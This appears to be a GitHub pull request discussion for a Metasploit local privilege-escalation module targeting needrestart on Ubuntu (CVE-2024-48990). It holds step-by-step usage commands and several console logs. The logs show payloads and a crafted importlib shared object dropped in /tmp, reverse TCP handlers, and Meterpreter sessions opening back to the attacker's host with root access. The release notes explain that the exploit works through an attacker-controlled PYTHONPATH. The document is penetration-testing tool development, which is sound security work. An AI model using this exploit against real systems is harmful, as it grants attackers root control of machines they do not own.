Ubuntu needrestart LPE (CVE-2024-48990)

[h00die]

Fixes #19675

Exploits needrestart on Ubuntu. Debian and Fedora put out patches, but after putting minor effort into testing them and a bunch of PoCs on github, I gave up trying to make it work. If someone wants to expand this module, be my guest. Happily working on Ubuntu though!

Verification

• Install the application
• Start msfconsole
• Get an initial shell
• Do: use exploit/linux/local/ubuntu_needrestart_lpe
• Do: set lhost <ip>
• Do: set lport <port>
• Do: set session <session>
• Do: run
• You should get a root shell.

[cdelafuente-r7]

Thank you @h00die ! I just left a couple of comments for you to review when you get a chance.

[dledda-r7]

Hello @h00die, I am trying the module against an Ubuntu 22.04.
This is the package I installed.

ii  needrestart                                3.5-5ubuntu2.4

However the target looks not vulnerable, with set verbose true I didn't get any other information.

[h00die]

https://ubuntu.com/security/CVE-2024-48990

Fixed: 3.5-5ubuntu2.2

So definitely not vulnerable. Are you running the check method and not getting output?

[dledda-r7]

https://ubuntu.com/security/CVE-2024-48990

Fixed: 3.5-5ubuntu2.2

So definitely not vulnerable. Are you running the check method and not getting output?

ouch, last number was different! not sure if I can get that version from apt gonna try now...

EDIT

Ok so, I've installed the vulnerable version of needrestart, however I am having some issue to trigger the vulnerability.

msf6 exploit(linux/local/ubuntu_needrestart_lpe) > exploit

[*] Started reverse TCP handler on 172.30.226.46:4445 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable needrestart version 3.5.pre.5ubuntu2 detected on Ubuntu 22.04
[*] Writing '/tmp/.6q2zZX8' (250 bytes) ...
[*] Uploading payload: /tmp/.6q2zZX8
[*] Creating directory /tmp/importlib
[*] /tmp/importlib created
[*] Uploading c_stub: /tmp/importlib/__init__.so
[*] Uploading py_script: /tmp/.UMzFtAjoc
[*] Launching exploit, and waiting for needrestart to run...

From metasploit side I see this, but on the target host when I do: sudo needrestart nothing happen, could be some configuration issue?

[h00die]

sorry, missed that there was an update/feedback!

[h00die]

From metasploit side I see this, but on the target host when I do: sudo needrestart nothing happen, could be some configuration issue?

When you do sudo needrestart it should pop up a progress bar saying something along the lines of 'scanning processes'. Your shell should execute at the end of that progress bar. Then it'll put a whole bunch of other things on the screen as well.

I just tried this exploit again on my 3.5.pre.5ubuntu2.1 detected on Ubuntu 22.04 and no issues.

Downgraded to 3.5-5ubuntu2 to mirror your setup, had no issues:

[msf](Jobs:2 Agents:1) exploit(linux/local/ubuntu_needrestart_lpe) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable needrestart version 3.5.pre.5ubuntu2 detected on Ubuntu 22.04
[*] Writing '/tmp/.hGNEfOOOIq' (250 bytes) ...
[*] Uploading payload: /tmp/.hGNEfOOOIq
[*] Creating directory /tmp/importlib
[*] /tmp/importlib created
[*] Uploading c_stub: /tmp/importlib/__init__.so
[*] Uploading py_script: /tmp/.ImbZfQ5Cr
[*] Launching exploit, and waiting for needrestart to run...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[+] Deleted /tmp/.hGNEfOOOIq
[+] Deleted /tmp/importlib/__init__.so
[+] Deleted /tmp/.ImbZfQ5Cr
[+] Deleted /tmp/importlib
[*] chown: changing ownership of '/tmp/.hGNEfOOOIq': Operation not permitted
[*] Error processing line 1 of /usr/lib/python3/dist-packages/zope.interface-5.4.0-nspkg.pth:
[*] 
[*]   Traceback (most recent call last):
[*]     File "/usr/lib/python3.10/site.py", line 192, in addpackage
[*]       exec(line)
[*]     File "<string>", line 1, in <module>
[*]   ImportError: dynamic module does not define module export function (PyInit_importlib)
[*] 
[*] Remainder of file ignored
[*] #########################
[*] 
[*] Dont mind the error message above
[*] 
[*] Waiting for needrestart to run...
[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:46304) at 2024-12-21 13:04:51 -0500

(Meterpreter 4)(/home/ubuntu) > getuid
Server username: root

[jheysel-r7]

Thanks for the module @h00die. A couple suggestions. I think this is about ready to land 🚀

[jheysel-r7]

Thanks for making those changes!

msf6 exploit(linux/local/ubuntu_needrestart_lpe) > run
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.65:4545
[*] Running automatic check ("set AutoCheck false" to disable)
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > [+] The target appears to be vulnerable. Vulnerable needrestart version 3.5.pre.5ubuntu2 detected on Ubuntu 22.04
[*] Writing '/tmp/.Ft9Ac1' (250 bytes) ...
[*] Launching exploit, and waiting for needrestart to run...
[*] Sending stage (3045380 bytes) to 192.168.1.71
[+] Deleted /tmp/.Ft9Ac1
[+] Deleted /tmp/importlib/__init__.so
[+] Deleted /tmp/.smfoWGc7lZ
[+] Deleted /tmp/importlib
[*] Meterpreter session 7 opened (192.168.1.65:4545 -> 192.168.1.71:53108) at 2025-01-09 16:59:40 -0800

msf6 exploit(linux/local/ubuntu_needrestart_lpe) > sessions -i -1
[*] Starting interaction with 7...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.1.71
OS           : Ubuntu 22.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[jheysel-r7]

Release Notes

This adds a post module which exploits needrestart on Ubuntu, before version 3.8. It allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable.